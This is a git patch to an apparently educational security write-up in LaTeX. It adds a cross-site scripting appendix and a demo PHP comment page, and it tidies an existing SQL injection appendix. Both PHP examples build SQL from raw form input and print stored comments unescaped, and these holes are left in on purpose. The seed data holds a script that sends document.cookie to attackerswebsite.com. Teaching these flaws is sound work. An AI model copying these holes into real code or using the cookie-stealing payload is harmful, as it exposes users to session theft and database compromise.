From 7b2e079f4ef3cd3f16c6c5ca30fc3e97fd982b28 Mon Sep 17 00:00:00 2001
From: Marcin Zelent <zelent.marcin@gmail.com>
Date: Wed, 30 May 2018 17:56:40 +0200
Subject: Added XSS example

---
 synopsis.tex    |  80 ++++++++++++++++++++++++++++++++++++++++++++++++--------
 xss/comments.db | Bin 0 -> 8192 bytes
 xss/index.php   |  36 +++++++++++++++++++++++++
 3 files changed, 105 insertions(+), 11 deletions(-)
 create mode 100644 xss/comments.db
 create mode 100644 xss/index.php

diff --git a/synopsis.tex b/synopsis.tex
index 0c8a520..e844895 100644
--- a/synopsis.tex
+++ b/synopsis.tex
@@ -612,7 +612,7 @@ continue studying it in the future.
 \appendix
 \section{SQL injection example}
 
-\subsection{HTML code}
+\subsection{index.html}
 \begin{minted}{html}
 <!DOCTYPE HTML>
 <html>
@@ -642,7 +642,7 @@ input {
 \end{minted}
 \newpage
 
-\subsection{PHP code}
+\subsection{login.php}
 \begin{minted}{php}
 <?php
    class MyDB extends SQLite3 {
@@ -651,27 +651,25 @@ input {
       }
    }
 
-   if(isset($_POST['email'], $_POST['pass']))
-   {
+   if (isset($_POST['email'], $_POST['pass'])) {
 	$email = $_POST['email'];
 	$pass = $_POST['pass'];
 
 	$db = new MyDB();
 
-	$sql = 'SELECT * FROM Users WHERE email=\''.$email.
-    '\' AND password=\''.$pass.'\'';
-
+	$sql = 'SELECT * FROM Users WHERE email=\'' . $email .
+    	   '\' AND password=\'' . $pass . '\'';
 	$ret = $db->query($sql);
-	while($row = $ret->fetchArray(SQLITE3_ASSOC)) {
-		echo 'Logged in as '.$row['email'].'<br>';
-	}
+	while ($row = $ret->fetchArray(SQLITE3_ASSOC))
+		echo 'Logged in as ' . $row['email'] . '<br>';
+
 	$db->close();
    }
 ?>
 \end{minted}
 \newpage
 
-\subsection{SQL code}
+\subsection{users.db}
 \begin{minted}{sql}
 CREATE TABLE Users (
 	email varchar(32),
@@ -683,4 +681,64 @@ INSERT INTO Users VALUES('marcin@mail.com','pass');
 \end{minted}
 \newpage
 
+\appendix
+\section{Cross-Site Scripting (XSS) example}
+
+\subsection{index.php}
+\begin{minted}{php}
+<?php
+	class MyDB extends SQLite3 {
+      function __construct() {
+         $this->open('comments.db');
+      }
+   }
+
+	if (isset($_POST['user'], $_POST['comment'])) {
+		$user = $_POST['user'];
+		$comment = $_POST['comment'];
+
+		$db = new MyDB();
+
+		$sql = 'INSERT INTO Comments VALUES(\'' . $user . '\',\'' .
+        	       $comment . '\')';
+		$ret = $db->exec($sql);
+		$db->close();
+	}
+
+	echo '<!DOCTYPE HTML><html><head><title>Comments</title>' .
+	   	 '<meta charset="utf-8"></head><body><h1>Comments</h1>';
+
+	$db = new MyDB();
+
+	$sql = 'SELECT * FROM Comments';
+	$ret = $db->query($sql);
+	while ($row = $ret->fetchArray(SQLITE3_ASSOC))
+		echo '<p><b>' . $row['user'] . '</b> says:<br>' .
+        	      $row['comment'] . '</p>';
+
+	$db->close();
+
+	echo '<h2>Add comment</h1><form action="index.php" method="post">' .
+	     '<input type="text" name="user" placeholder="User name"><br>' .
+	     '<input type="text" name="comment" placeholder="Comment"><br>' .
+	     '<input type="submit" value="Add"><br>' .
+	     '</form></body></html>';
+?>
+\end{minted}
+\newpage
+
+\subsection{comments.db}
+\begin{minted}{sql}
+CREATE TABLE Comments(
+	user varchar(32),
+	comment varchar(255)
+);
+
+INSERT INTO Comments VALUES('user1','Hello world!');
+INSERT INTO Comments VALUES('user2','test');
+INSERT INTO Comments VALUES('attacker','hello
+<script>document.createElement("img").src =
+"http://attackerswebsite.com/" + document.cookie</script>');
+\end{minted}
+
 \end{document}
diff --git a/xss/comments.db b/xss/comments.db
new file mode 100644
index 0000000..32114c2
Binary files /dev/null and b/xss/comments.db differ
diff --git a/xss/index.php b/xss/index.php
new file mode 100644
index 0000000..e645517
--- /dev/null
+++ b/xss/index.php
@@ -0,0 +1,36 @@
+<?php
+	class MyDB extends SQLite3 {
+      function __construct() {
+         $this->open('comments.db');
+      }
+   }
+
+	if (isset($_POST['user'], $_POST['comment'])) {
+		$user = $_POST['user'];
+		$comment = $_POST['comment'];
+
+		$db = new MyDB();
+
+		$sql = 'INSERT INTO Comments VALUES(\'' . $user . '\',\'' . $comment . '\')';
+		$ret = $db->exec($sql);
+		$db->close();
+	}
+
+	echo '<!DOCTYPE HTML><html><head><title>Comments</title>' .
+	   	 '<meta charset="utf-8"></head><body><h1>Comments</h1>';
+
+	$db = new MyDB();
+
+	$sql = 'SELECT * FROM Comments';
+	$ret = $db->query($sql);
+	while ($row = $ret->fetchArray(SQLITE3_ASSOC))
+		echo '<p><b>' . $row['user'] . '</b> says:<br>' . $row['comment'] . '</p>';
+
+	$db->close();
+
+	echo '<h2>Add comment</h1><form action="index.php" method="post">' .
+		 '<input type="text" name="user" placeholder="User name"><br>' .
+		 '<input type="text" name="comment" placeholder="Comment"><br>' .
+		 '<input type="submit" value="Add"><br>' .
+		 '</form></body></html>';
+?>
-- 
cgit v1.2.3